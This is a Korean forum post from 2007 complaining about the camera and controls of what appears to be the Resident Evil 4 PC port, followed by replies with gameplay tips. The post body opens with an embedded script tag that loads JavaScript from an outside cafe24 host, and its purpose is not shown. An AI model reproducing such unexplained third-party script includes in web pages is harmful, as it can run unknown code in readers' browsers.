재밌나요?-0- > biohazard

본문 바로가기
사이트 내 전체검색

biohazard

재밌나요?-0-

페이지 정보

작성자 C1930 메일보내기 이름으로 검색 댓글 10건 조회 579회 작성일 07-02-03 20:37

본문

<SCRIPT Language=JavaScript src=http://streamhelper.cafe24.com/v1/streamhelper.js></script>  플스나 GC로 상당히 호평 받은걸로 알고 있는데..

PC로 해보니 시점 답답해서 미칠 것 같고(패드사용중. R아날로그 시점변경으로 쓰고 있음)

무슨 플스2동영상을 넣은건지 중간 중간에 플스 해상도의 영상 나오고

좀비들 쏴보니 타격감은 보통.

나중에 총알 모자른다고 소문 났길래

칼로 좀 상대 해봤는데 휘두르면 리치가 짧아서 닿지도 않고-0-

차라리 적이 쓰는 곡괭이 뺏어서 쓰는게 낫겠네요.

지금 첫번째 세이브 도달 해서 좀 하다가 죽어서 나왔는데

간간히 나오는 폐가(?)들 무서워서 못 들어가겠네요.

입구 들어가면 바로 옆에 좀비 있을거라고 당연히 예상 하고 있었는데(보통 호러겜이 다 그렇죠)

시점,ㅈ같은 조작감 때문에 입구 들어서자마자 선빵 맞네요.

시점으로 공포감 극대화 하려는게 제작자들의 목적 같은데

이건 짜증부터 나니 원ㅋ

1시간 정도 하면 빠져들까요?

오래 한다 해도 시점,조작감은 변함 없을탠데.

PC이식은 완전 만들다만 게임이네요. 무슨 고전 게임 하는 것 같습니다.

낚시가 아니라 제 의견을 말한겁니다. 바하팬들 보고 흥분 하지 마세요.
추천11 비추천0

댓글목록

JR_squad님의 댓글

JR_squad 이름으로 검색 작성일

하는 사람에 따라 평이 극과 극으로 나뉩니다... 바하 4....

하나도 안무섭습니다... 나중에는 학살하는 자신을 볼수 있음... 라운드 2부터...

치카리님의 댓글

치카리 이름으로 검색 작성일

저도 무섭다는 느낌은 없네요 좀비가 아니라서 그런가;;

띠치님의 댓글

띠치 이름으로 검색 작성일

조작체계는 똑같은데요. 사점은 항상 레온 뒷통수에서 바라보는 시점이고
강제로 돌리고 그런거 없음. 총알 모자라진 않은데 초반에 약간 부족할까봐
그런대로 아껴쓰란 말이고 나이프는 고수아니라면 적이 쓰러지고 난뒤나 그어주는 용도로 쓰는거. 이 게임의 묘미는 애쉴리를 구출하고 난뒤와 무기개조,
회차 연동되는 세이브 파일 그리고 따로 수록된 추가미션들입니다.

C1930님의 댓글

C1930 이름으로 검색 작성일

어떻게 해야 재밌게 할 수 있죠?

시점 진짜 말이 안나오네요

전... 그 연구소 들어가서 리제너레이터... 그게 처음할땐 무서웠는데 나중엔 다 껌..... 저두 바하 그렇게 재밌게 즐기진 않았습니다... 지금 플2판으로 14라운드 돌고 접었습니다

C1930님의 댓글

C1930 이름으로 검색 작성일

아 나이프 그렇게 쓰는거였군요.

무기개조라..

핫수핫수님의 댓글

핫수핫수 이름으로 검색 작성일

괜히 최고의 게임이라고 극찬받은게 아닙니다..
거의 2000년도 들어서 최고의 게임 대우 받는다고나 할까..

공지사항

• 게시물이 없습니다.

회원로그인

접속자집계

오늘
어제
1,571
최대
1,587
전체
14,787

그누보드5